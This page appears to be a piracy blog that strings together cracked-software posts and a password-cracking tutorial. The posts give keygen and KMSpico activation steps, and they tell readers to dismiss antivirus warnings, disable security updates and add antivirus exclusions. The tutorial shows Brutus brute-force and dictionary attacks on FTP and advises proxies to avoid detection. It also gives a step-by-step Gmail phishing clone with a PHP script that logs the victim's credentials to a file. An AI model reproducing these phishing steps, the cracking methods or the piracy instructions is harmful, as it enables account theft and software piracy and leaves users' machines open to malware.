Portuguese: Cone do Malwarebytes’ Anti-Malware (Photo credit: Wikipedia)
Taking the Byte out of Malware Malwarebytes technology takes the next step in the fight against malware. Malwarebytes Anti-Malware PRO detects and removes malware where even the best known anti-virus and anti-malware applications fail.
Malwarebytes Anti-Malware PRO monitors every process and stops malicious processes before they even start. The Proactive Protection Module keeps your system safe and secure with advanced heuristic scanning technology.
Malwarebytes Anti-Malware PRO Features include:- Flash - Lightning fast scan speeds
- Thorough - Full scans for all drives
- Works Well With Others - Cooperative functionality
- Puts YOU first! - Priority database updates
- Puts Malware in the Slammer - Quarantine function holds threats and lets you restore at your convenience
- Talk to the hand - Ignore list for both the scanner and Protection Module
- For Your Pleasure - Customizable settings enhance performance
- Lock It Down - Password protect key program settings
- Chameleon - Gets Malwarebytes running when blocked
- Toolbox - Extra utilities to help remove malware manually
- Nitty Gritty - Command line support for quick scanning
- RPP, Yeah You Know Me - Real-time Proactive Protection Module
- Hablamos Everything! - Multi-lingual support (Klingon still in beta)
* Windows Vista/Windows 7/Windows 8 (32 bit and 64 bit)
* Windows XP Service Pack 2 or Later
* Internet Explorer 6 or newer
Hardware Requirements:* 256MB of RAM (512MB or more recommended)
* 800MHz CPU or faster
* 20MB of free hard disk space
* 800x600 or greater screen resolution
* Active internet connection for database and product updates
Languages Available: English, Arabic, Bosnian, Bulgarian, Catalan, Chinese Simplified, Chinese Traditional, Croatian, Czech, Danish, Dutch, Estonian, Finnish, French, German, Greek, Hebrew, Hungarian, Italian, Latvian, Lithuanian, Macedonian, Norwegian, Polish, Portuguese (Brazil), Portuguese (Portugal), Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, Swedish, Thai, Turkish, Vietnamese.
1. Install application by double clicking on "mbam-setup-220.127.116.110.exe"
2. IMPORTANT: CLOSE THE APPLICATION before using the keygen FFF.
(Otherwise the program does not validate serial if a keygen is
detected and it will give warning as "don't.steal.our.software")
3. Run "w00t.exe" in folder "Keygen FFF" and copy / paste "product id"
and "product key" on a text file.
4. Close the keygen IMPORTANT.
5. Open the application and enter "product id" and "product key".
6. Run application and go to "Settings - Updater Settings" uncheck
"Download and install update if available" IMPORTANT
7. IMPORTANT: Some security softwares may warn you, it is false positive.
Download Malwarebytes Anti-Malware 18.104.22.1680 Here:
- Malwarebytes Anti-Malware 1.75 update adds archive scanning (ghacks.net)
- MalwareBytes Anti-Malware Pro Now Recognized as Leading Virus Removal Software by OnlineVirusRepair.com (prweb.com)
- Malwarebytes Anti-Malware 1.70 (pcmag.com)
- Thousands Of Computers Attacked By MalwareBytes Monday (eteknix.com)
- A dozen tools for removing almost any malware (windowssecrets.com)
- 7 signs your computer has a malware problem (itproportal.com)
- Malwarebytes Security Researcher Plays Along With Tech Support Scammer (besttechie.com)
- Spyware and Virus Removal Guide (davishelp.wordpress.com)
- Rootkit coders beware: Malwarebytes is in hot pursuit (techrepublic.com)
- Anti-Virus Software Is Not Enough Protection for Computers, Says Virus Experts at OnlineVirusRepair.com (prweb.com)
The World’s Leading Blu-ray, DVD, HD, 3D Movie & Media Player
With over 100 million copies shipping annually, PowerDVD is the world’s leading Blu-ray, 3D & HD media player. Experience HD movie files at quality beyond HD and enjoy striking playback enhancements for music, photos and video. Play media from your PC, home network, connected devices, YouTube and Facebook. Extend your reach with PowerDVD Mobile apps to enjoy media on Android, iOS and Windows tablets and smartphones. Today’s premiere universal player, PowerDVD makes it simple to play all your media at its best.
What is new in PowerDVD 13
Take video beyond HD
CyberLink TrueTheater® enhancement now delivers advanced edge enhancement, color and lighting enhancement technologies to take Blu-ray and HD digital movies beyond Full HD quality.
* Movies look even better on Full HD displays and higher resolution WQHD (2560x1440) panels.
* New HD video enhancement features work with MKV, MP4 and other popular HD movie formats.
Stunning Quality Subtitles
An all new subtitling engine offers sparkling quality and unprecedented flexibility.
* Edit subtitle size, color, border color and position.
* Display primary and secondary subtitles simultaneously for Blu-ray disc, DVD discs, and MKV / MP4 movies.
* View PGS subtitles in MKV movie files.
* Specify character encoding schema for non-Unicode subtitle files.
* Display subtitles outside of picture in screen letterbox region.
* Load subtitles by drag and drop. Adjust subtitle timing to sync with video.
Fast, Fast, Fast
New architecture and application optimization deliver fastest, most responsive PowerDVD ever.
- Enjoy fastest-ever launch of Blu-ray and DVD movies.
* Option to bypass BD-Live for even faster Blu-ray movie launch - up to 58% faster!
* Instant playback for music, video and photos
All New Movie Library
The new Movie Library unites your movie collection with access to online info and social media sharing to make watching movies more interactive and fun!
* Displays file-based movies with cover art and links to online info about the film.
* See movie summaries and reviews. Add your comments and connect with friends via social media. See movie-related activities from your Facebook friends.
* Explore the new Movie Info tab - your connection to the info on new releases, celebrities and more.
Enjoy music, photos in and video in the latest formats.
* Play music in the lossless APE format
* Play video in the AVCHD 2.0 format video, including AVCHD progressive and AVCHD 3D, at data rates up to 28 Mbit/s.
New Ways to Play
Getting playback going in PowerDVD is easier and faster than ever.
* Drag-and-drop Blu-ray or DVD folders to the PowerDVD icon to start playback.
* Drag and drop a folder to the PowerDVD media window to play all media in the folder.
* Start video or photo playback from Windows Explorer to play all the media files in the same folder.
Playback and navigation controls
New controls put just the right playback and navigation options at your fingertips.
* Rotate video during playback
* Auto rotation of photos and video shot in portrait orientation.
* Jump between chapters in MKV movies.
* New A-B Repeat panel makes it easy to choose portions of a video to repeat.
* Volume adjustment changes the application volume independent of the system volume.
* New Play Speed Navigator panel lets you change playback speed instantly.
* Watch at high-quality 0.3x speed for slow motion replay.
* Use arrow keys to skip forward 30 seconds and backward 8 seconds during video playback.
* View scene thumbnails for DVDs and MKV/MP4 movies when you scrub the navigational slider.
* Resume file-based movies from where you last stopped. Resume movies in Classic or Cinema mode no matter the mode in which they were last played.
New window controls make PowerDVD easier to use. Customization options let you tailor PowerDVD to your needs.
* Park the mouse on either side of the screen to instantly hide top and bottom panels in full screen mode.
* Drag anywhere on the video screen to reposition the PowerDVD window.
* Toggle interface time display between elapsed and remaining time.
* The current time displays in the caption bar.
* Mouse over to show when playback will complete.
* See current battery level in the caption bar.
New and enhanced playback modes
Take advantage of more ways to play and enjoy your content.
* Cinema mode has been re-designed for touchscreen operation and now supports file playback.
* A new mini music player makes it easy to play music in the background while you are doing other things on your computer.
* A new print feature lets you print pictures individually or in groups when viewing photos.
Smarter under the hood
PowerDVD builds-in a wide range of new and improved technologies – all designed to make your playback experience the best.
* Improved DLNA compatibility and performance.
* Share content located in USB devices or NAS.
* TV refresh rate is automatically synced to DVD frame rate for a higher quality picture.
* Settings to adjust video & audio synch when connecting separate TV and audio amplifier.
* High DPI support. Automatically scale the interface to 170% when the OS DPI is high.
* A reduced number of background processes.
* Manage content cache files to limit the cache size.
* Option to remove content from library without deleting from hard drive.
* Reduced computing required for media scanning to populate the media library.
* Option to pause and resume scanning of the media library.
* Halt background processes for features turned off in the interface.
Operating Systems: Windows XP SP3, Windows Vista, Windows 7, Windows 8
Graphics Processor (GPU) - Blu-ray Disc, DVD, and TrueTheater HD/3D Playback
Intel HD Graphics, ATI Radeon HD 5000, NVIDIA GeForce 9500GT or above
* Note: We strongly recommend that you update your graphics card driver to the latest version. 3D display devices are required for TrueTheater 3D playback.
Languages : English, French, German, Italian, Spanish (European), Chinese Simplified, Chinese Traditional, Japanese, Korean, Russian, Portuguese
Download CyberLink PowerDVD ULTRA 13.0.2720.57 Full Here:
- CyberLink PowerDVD 13: better image quality, easier to use and faster than ever (pcauthority.com.au)
- CyberLink releases PowerDVD 13 (betanews.com)
- Review: PowerDVD 13 Ultra media player is loaded with under-the-hood improvements (pcworld.com)
- CyberLink PowerDVD 13 Ultra review (betanews.com)
- How to fix corrupt DVD playback in OS X (reviews.cnet.com)
- Cyberlink's PowerDVD 13 universal media player for Windows 8, iOS, and Android has an improved UI and 4K support (engadget.com)
- *Cyberlink PowerDVD 12 Ultra (cyberlinkdvdec00rpu000powerdvd12ultsale8w.wordpress.com)
- CyberLink PowerDVD Ultra 13.0 Full Version (engineeringstudentscandoanything.wordpress.com)
- How to use Blu-ray Media Player software? (doreenbush.wordpress.com)
- Avanquest Recommends DIZ, PVM, SIG, and SUB Types of Software (prweb.com)
Hi Visitors I hope you all are doing well and today i thought of posting the ESET Smart Security Keys for you which are latest and updated one and it was a long time i had posted this again so surely i will update it day by day and keep you in update and these will be helpful to activate your ESET Smart Security Antivirus and Protect yourself from harmful virus and trojan's which helps to keep your system clean and speed.
- Softpedia Exclusive Interview: ESET Experts on Threat Landscape and Security Products (news.softpedia.com)
- ESET Mobile Security 2.0 Preview: Improved Security for Android (news.softpedia.com)
- ESET_Nod_32_Antivirus_v4.2.42 free download-zile (rarfree.wordpress.com)
- ESET New Version 6 Products Launched in India (changeagentspr.wordpress.com)
- Popular security utilities for OS X put to the test (reviews.cnet.com)
- Tablets, laptops among top devices for BYOD (lenovo.com)
- ESET Offers "Buy 1 Get 1 Free" on new Version 6 Home Products (changeagentspr.wordpress.com)
- ESET Smart Security 6.0.308.0 (32bit) (pechseyla.wordpress.com)
- Download ESET NOD32 Antivirus 6 and ESET Smart Security 6 Antivirus for Free (library4kh.wordpress.com)
- ESET Launches Managed Service Provider Program (virtual-strategy.com)
MD4: 1c06c693f1e68ce4d2ff4ecc45dd0388MD5 x32: 58C45B5983DE144236F0F61C14E39CC6
Windows 8 Professional x32 Untouched ISO
Step 1) Use the Windows USB/DVD tool.
-You will need a USB flash drive with at least 4GB of space
-Or, you can burn ISO to a blank DVD
Step 2) Insert your bootable USB drive or DVD disc
-Restart your computer and access the boot menu
-Press ESC, F1, F2, F10, F12, or DEL to bring up the boot menu
(The key depends on your computer's manufacturer)
-Select your Windows 8 bootable media
-Windows 8 Installation Key: http://pastebin.com/axc9SWJw
KMSpico v5.1 - is the ideal tool to activate the final version of Windows 7/8 and Office 2010/2013. Actuator does not require user intervention, the entire activation process takes place in the background, just run the activator and a couple of minutes to check the activation status of Windows and / or Office.
• Universal (Activates Windows Vista/7/8 Pro/Enterprise/N/VL and Office 2010/2013 Retail/VL.)
• Does not require user intervention (enough to run the activator).
• Simultaneous activation immediately and Windows, and Office.
With KMSpico can:
• Activate Windows 8 Enterprise
• Activate Windows 8 Professional
• Activate Microsoft Office 2013
• Activate Microsoft Office Visio 2013
• Activate Microsoft Office Project 2013
• Activate Microsoft Office 2010
• Activate Microsoft Office Visio 2010
• Activate Microsoft Office Project 2010
• Activate Windows 7 Enterprise
• Activate Windows 7 Professional
• Activate Windows Vista Enterprise
• Activate Windows Vista Professional
• Microsoft Windows Server 2012
Requirements: .NET 4.0 or Windows 8.
Activates Windows Vista/7/8 and Office 2010/2013.
Windows Server 2008/2008R2/2012
1. Run KMSpico.exe or RunTrigger.cmd
Based off of Microsoft Toolkit - Official KMS Solution for Microsoft Products 2.4.1.
Change Log v5.1
- Changed Server to deagles's emulator.
If you install a Office Retail Version after the installation of KMSpico, then run again the shortcut KMSpico to make the conversion, because the Service installed only activate VL.
How This Program Works:
1. Run KMSELDI.exe
1.1. Check Products Installed.
1.2. Convert Retail to VL if it is necessary.
1.3. If it found a non-permanent product it will converted. (hacktivators based in modified dll's ARE NOT PERMANENT) (MAK or OEM keys are the only ones PERMANENT)
1.4. Create a random service kms emulator in memory.
1.5. Activate for 180 days all VL products installed against the emulator.
1.6. Close emulator and KMSELDI.
2. Install Service KMSELDI
2.1. Every windows start or every 24 hours the service reactivate for 180 days (reset the count) with a random kms emulator.
2.2. Close emulator.
3. KMSELDI + Service KMSELDI = "permanent".
- Disable Microsoft Security Updates.
- Make exceptions to Directory %ProgramFiles%\KMSpico in Antivirus.
Size: 2.09 MB
Download KMSpico v5.1 for Offline Office 2013 Here:
- Microsoft Office 2013 Activator (hackncrackz.blogspot.com)
- New - Microsoft Office 2013 (aelizabethwest.wordpress.com)
- Microsoft launching new security measure across Xbox, Windows & other services (officeprofessional2013.wordpress.com)
- Product Review: Office 2013 (techlearning.com)
- Microsoft Office 2013 Key Generator (2013hackfree.wordpress.com)
- Microsoft Office 2013 Key Generator (dayhacks.wordpress.com)
- Does it still make sense to buy Microsoft Office? (reviews.cnet.com)
- PolicyPak Releases Whitepaper for Office 2010 & 2013 Admins (prweb.com)
- Microsoft Office 2013 Key Generator (e24hack.wordpress.com)
- Microsoft Office 2013 Key Generator (freehack2013.wordpress.com)
English: Avira Operations GmbH & Co. KG (Photo credit: Wikipedia)
Unleash the power you didn’t know your PC had. Has your computer slowed down over time? Give it maintenance, not patience! Your PC’s best days are still yet to come. Clean it up. Tune it up. Free your PC to perform at its best! Throughout its life, your PC accumulates programs, logs, junk files, cookies and other scraps that stick around long after they are needed. All they really do is weigh down your memory and processor.
Maybe you’ve already tried deleting unwanted files but got no relief from the persistent slowness of your PC. That’s because you haven’t reached the glut of temporary files, bad Registry entries and runaway processes beneath the surface.
Avira System Speedup boldly goes where no user can, safely and thoroughly removing unused programs and files, optimizing Windows to bring back the fast, error-free performance you deserve!
Lightens your computer’s load
The System Cleanup module includes a complete set of tools that swiftly and safely clear out PC clutter. Recover significant amounts of wasted space with a Junk Files Cleaner, Registry Cleaner and Smart Defragmenter. Activate the Privacy Cleaner to clear out the data downloaded in your everyday web browsing.
Goes to the source of slowness, freezes and crashes
All PCs must run a number of processes behind the scenes. As new applications are added, background activity can grow chaotic, resulting in errors and hanging. The System Optimizer, complete with a Process Manager and Service Manager, puts wayward PC processes back on track. The Startup Manager speeds up boot time by limiting the number of tasks performed while Windows loads.
Leaves no souvenirs of the past
It’s your PC—you should have the final word as to which files can be accessed by others. File Encryption keeps current files on lockdown against prying eyes, while the File Shredder and Disk Wiper ensure that deleted items cannot be recovered. The Uninstaller allows no remnants of removed applications to waste space on your machine or cause errors in the future.
Thoroughly inspects your PC’s health
No appointment is necessary to have the Disk Doctor find, diagnose and repair hard disk errors. The Disk Analyzer checks for opportunities to improve disk space usage. For preventive care, the Drivers monitor keeps track of the software that links your operating system to your hardware, reducing the risk of hardware failure.
Operating Systems: Windows 7 (32-bit or 64-bit), Windows Vista (32-bit or 64-bit), Windows XP (32-bit)
Processor: 300 MHz processor or higher
Memory: Min. 256 MB RAM
Hard Disk: Min. 12 MB available disk space
- Install program.
- Run " Regme" In the key folder and merge it to System Registry.
- Done, Enjoy.
Download Avira System Speedup v 22.214.171.12400 Full Here:
Avira System Speedup v 126.96.36.19900 Setup : Link
- Avira System Speedup 188.8.131.5200 (tekush.wordpress.com)
- Smart PC Fixer Reviewed | Honest Feedback & Review (realreviewslaunch.wordpress.com)
- SpeedupMyPC 2013 Full Version With Serial Free Download (hackncrackz.blogspot.com)
- Upgrade to Windows 8 Pro for $39 Bucks [+ get $70 in free app offers] (epicagear.com)
- Top 10 FREE Data Recovery Software (cat3movies.wordpress.com)
- Windows 8 support in Avira Antivirus (h-online.com)
- Top Selling Registry Cleaner Reaches Over 3 Million Downloads in First Quarter (prweb.com)
- WinUtilities Professional Edition v10.6 Multilanguage (torrentbaza.com)
- Take complete care of your PC with Wise Care 365 (soft32.com)
- Yamicsoft Windows 8 Manager v1.0.9 (torrentbaza.com)
Advanced SystemCare+Utility+home+dignose+system+icon+ico+image+whitehatandroid (Photo credit: Shekhar_Sahu)
Advanced SystemCare Pro 184.108.40.206 Final Full Version | 21.7 MB
Advanced SystemCare PRO Edition The World’s Top System Utility for Superior PC Health. Advanced SystemCare PRO (formerly Advanced WinodwsCare Professional) provides an always-on, automated, all-in-one PC Healthcare Service with anti-spyware, privacy protection, performance tune-ups, and system cleaning capabilities. This powerful and award-winning precision tool fixes stubborn errors, cleans out clutter, optimizes internet and download speeds, ensures personal security and maintains maximum computer performance automatically.
• Designed for the latest Windows system environment. Gives your PC better speed and reliability
• Powerful Hard Drive Defrag and Optimization
• Next-generation Registry Deep Clean and Optimization
• Automated Working in the Background
• Defends PC Security with Extra Protection
• Quick and Extensive Clean-up for Hard Drives
• Keeps Your PC Running at Peak Performance
• Fixes Multiple System Errors
Download Advanced SystemCare Pro 220.127.116.11 Here:
- [Windows] Optimize and clean your computer with Advanced SystemCare (dottech.org)
- Advanced SystemCare Professional v18.104.22.168 + Serials (kampustimik.wordpress.com)
- Advanced System Care 6.0 Professional (khmonster.wordpress.com)
- Give your Android smartphone a new lease of life with these free apps (betanews.com)
- Baidu PC Faster is a free system maintenance tool for Windows (ghacks.net)
- Nine PC Prep Tips for a Fresh Operating System Install (staples.com)
- Curious Intern Mucks Up Office PC Security (staples.com)
- Good Morning (: (thealmostperfectblog.wordpress.com)
- Advanced SyatemCare Ultimate - Ultimate Solution to Secure and Speed up PC (techjagat.com)
- BitDefender Total Security 2013 Special Offer: 60% OFF! (softzine.net)
English: A candidate icon for Portal:Computer security (Photo credit: Wikipedia)
Nowadays, passwords are the only form of security on most websites and computer systems. It has become one of the most common and easiest ways for a hacker to gain unauthorized access to your computer or network.
Before we get into cracking passwords with programs, I will explain a couple old-fashioned ways to obtain someone’s password.
Social engineering is when a hacker takes advantage of trusting human beings to get information from them. For example, if the hacker was trying to get the password for a co-workers computer, he (Even though I use “he”, hackers are of both genders, and I just chose to use “he” in these examples.) could call the co-worker pretending to be from the IT department. The conversation could be something like:
Atul- “Hello Ankita. My name is Atul and I’m from the IT department. We are currently attempting to install a new security update on your computer, but we can’t seem to connect to the user database and extract your user information. Would you mind helping me out and letting me know your password before my boss starts breathing down my neck? It’s one of those days, ya’ know?”
Ankita would probably feel bad for Atul and let him know her password without any hesitation. BAM! She got social engineered. Now the hacker can do whatever he pleases with her account.
Shoulder surfing is exactly what it sounds like. The hacker would simply attempt to look over your shoulder as you type in your password. The hacker may also watch weather you glance around your desk, looking for a written reminder or the written password itself.
If you use a weak password, a hacker could simple guess it by using the information he knows about you. Some examples of this are: date of birth, phone number, favorite pet, and other simple things like these. Now that we have the simple low-tech password cracking techniques out of the way, let’s explore some high-tech techniques. Some of the programs I will use in my examples may be blocked by your anti-virus programs when you attempt to run them. Make sure you disable your anti-virus program when you decide to download and explore them. There are different ways a hacker can go about cracking a password. Below I will explain and give an example of each way.
A dictionary attack is when a text file full of commonly used passwords, or a list of every word from the dictionary is used against a password database. Strong passwords usually aren’t vulnerable to this kind of attack. In the following example, I will use Brutus, a very common password cracker, to show a dictionary attack against an ftp server. Brutus is a Windows only program, but at the end of this chapter I will list a couple more password crackers, some of which are made for Mac, Windows, and Linux.
Before I get into the example, you must first know what an FTP server is. FTP stands for File Transfer Protocol. FTP is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete/upload anything he wants on my server. An FTP address looks similar to a website address except it uses the prefix ftp:// instead of http://. I set up an FTP server on my computer so I could demonstrate. You can get Brutus at http://www.hoobie.net/brutus/ .
1. First the hacker would choose a target. In this case it’s my home computer and the IP address for your home computer is 127.0.0.1 .
2. By going to ftp://127.0.0.1 I get a pop-up box asking for a username and password.
3. Next the hacker would launch a program similar to Brutus and attempt to crack the password.
4. In the target you put the IP address of the website and to the right select the appropriate option, which in this case is FTP.
5. The default port is 21 but some websites change this to make them a little more secure. If you find out that the port isn’t 21, you can find the right one by doing a port scan. We will get into this later in the book.
6. If you don’t know any of the usernames for the FTP server, then you will have to get a list of the most common usernames.
7. For a dictionary attack you will have to choose the pass mode Word List and browse and select the file containing your word list. You can get some good password lists at http://packetstormsecurity.org/Crackers/wordlists/ . Below are examples of what a username and password list might look like.
8. Once you hit Start the program will attempt to connect to the server and begin to try all the possible combinations from your lists.
9. If you’re lucky, eventually it’ll get the right Username:Password combination.As you can see below, it got the correct combination of username – admin and password – password.
10. A smarter hacker would use a proxy when using a program like this. What a proxy does is cloaks your IP address by sending your connection request through another computer before going to the target. This is a smart idea because as you will see in the image below, Brutus leaves a huge log of your presence on the target server.
11. In place of the IP address 127.0.0.1 would be the hackers IP address. Footprints like these get a hacker caught and into a lot of trouble with the law.
With time, brute-force attacks can crack any passwords. Brute-force attacks try every possible combination of letters, numbers, and special characters until the right password is found. Brute-force attacks can take a long time. The speed is determined by the speed of the computer running the cracking program and the complexity of the password. Below I will show you how Brutus can be used against the same FTP server but this time using the brute-force option.
1. Put in the target and port the same way you did for the dictionary attack. For the pass mode choose Brute-force and click range.
2. If you have an idea of what the password might be, then you can choose the right option. For example if you know a site that requires your password to be a certain length then you’ll know what to put down as a minimum length thus narrowing down the end results and shortening the cracking process.
3. I chose lowercase alpha which has the second smallest amount of combinations. Even at second smallest it came up with 321, 272,407 possible password combinations. Now you know why it can take so long to crack one password.
A Rainbow table is a huge pre-computed list of hash values for every possible combination of characters. A password hash is a password that has gone through a mathematical algorithm that transformed it into something absolutely foreign. A hash is a one way encryption so once a password is hashed there is no way to get the original string from the hashed string. A very common hashing algorithm used as security to store passwords in website databases is MD5.
Let’s say you are registering for a website. You put in a username and password. Now when you submit, your password goes through the MD5 algorithm and the outcome hash is stored in a database. Now since you can’t get the password from the hash, you may be wondering how they know if your password is right when you login. Well when you login and submit your username and password, a script takes your password and runs it through the md5 algorithm. The outcome hash is compared to the hash stored in the database. If they are the same, you are admitted.
If I were to run the word “cheese” through the md5 algorithm, the outcome would be fea0f1f6fede90bd0a925b4194deac11. Having huge tables of every possible character combination hashed is a much better alternative to brute-force cracking. Once the rainbow tables are created, cracking the password is a hundred times faster than brute-forcing it. I will show an example of rainbow table cracking when we get into Windows password cracking.
Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.
1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.
2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit <CTR> + S
which does this automatically. Choose where you would like to save the web page and hit Save.
3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.
?php // This marks the beginning of the PHP script.
"Header(“Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=default<mplcache=2 “); // once you click “Sign in” in the fake website, this redirects you to the real Gmail website, making the whole process look more legit.
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file “list.txt” and get it ready for appending data. Which in this case is your username and password.
Foreach($_GET as $variable => $value)
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
?> // Marks the end of the PHP program.
So far you should see the following in your folder:
5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.
6. Hit <CTR> + F , or go to Edit -> Find , type in action and hit “Find Next”.
7. This will highlight the first occurrence of the word “action” in the script.
There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:
Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.
8. Save and close the file.
9. Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.
10. Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “yourwebhostname chmod”.
11. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
12. Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the following:
As you can see if you fell for this the hacker would have your email and password. Scary, naah?
I will now show you all the countermeasures you should take to protect yourself from all of the password cracking attacks talked about in this chapter.
To protect yourself from social engineering attacks like the one discussed in this chapter you must learn to question the possible attacker. If you get a phone call from someone, and you think that there may be a chance that the person isn’t who he says he is, then ask him some questions that he should be able to answer to establish his legitimacy. Some professional social engineers study the company before attacking, so they might know all the answers. That’s why, if you still have some doubts, you should ask the head of whatever department the attacker is from to find out if he is legit. Better safe than sorry.
When you type in your password make sure there is no one behind you attempting to peak. If there is, turn around and drop kick him/her in the face. No not really. Also, make sure you don’t keep any sticky notes laying around that have your password or password hints on them.
To prevent this attack from happening, never use a password like your birth date, your mother’s maiden name, your pets name, your spouse’s name, or anything that someone may be able to guess.
Dictionary attacks are very simple to prevent. Don’t use a password that is in the dictionary. Some people may think that if they use a word from the dictionary but replace most of the letters with a number, then they are safe. They are not. There are 1337 speak dictionary’s out there too. Basically what 1337 speak is, is changing a word like “animal” to 4n1m41. For a secure password, I would recommend using a phrase such as “doyoulikecheese?88”.
Brute-force attacks may be prevented by creating a very long password and using many numbers and odd characters. The longer the password the longer it takes for the hacker to crack your password. If after a few days the hacker hasn’t been able to crack your password through a brute-force attack, then he is very likely to just give up. Like I said in the dictionary attacks, creating a phrase for your password is your best option for staying secure.
You can avoid rainbow table cracking by simply making your password extremely long. Creating tables for passwords that are long takes a very long time and a lot of resources. That is why there aren’t many of these tables available.
Phishing attacks are very simple to avoid. When you are asked to put your personal information into a website, look up into the URL bar. If for example you are supposed to be on Gmail.com and in the URL bar it says something completely different like gmail.randomsite.com, or gamilmail.com, then you know this is a fake. When you are on the real Gmail website, the URL should begin withwww.google.com anything else is a fake.
Now that you know what password cracking is, you might be interested in learning some more of the popular cracking software I have listed below:
- Creating A Visual Basic Password Cracker (opensourcenigeria.wordpress.com)
- Tips for Creating Strong passwords (hackingpedia.wordpress.com)
- New tool cracks Apple iWork passwords (reviews.cnet.com)
- The Most Unsafe Passwords of 2012 Look a Lot Like the Ones from 2011 (staples.com)
- FTP Client/Server (stackoverflow.com)
- Dictionary attack - combinations of words (community.spiceworks.com)
- Violent Python (i-programmer.info)
- Step by Step Guide on How to Setup FTP Server on Windows 8 (lasdrashid.wordpress.com)
- Fast Password Cracking with a Huge Dictionary File and oclHashcat-Plus (cyberarms.wordpress.com)
- Mtp (wiki.archlinux.org)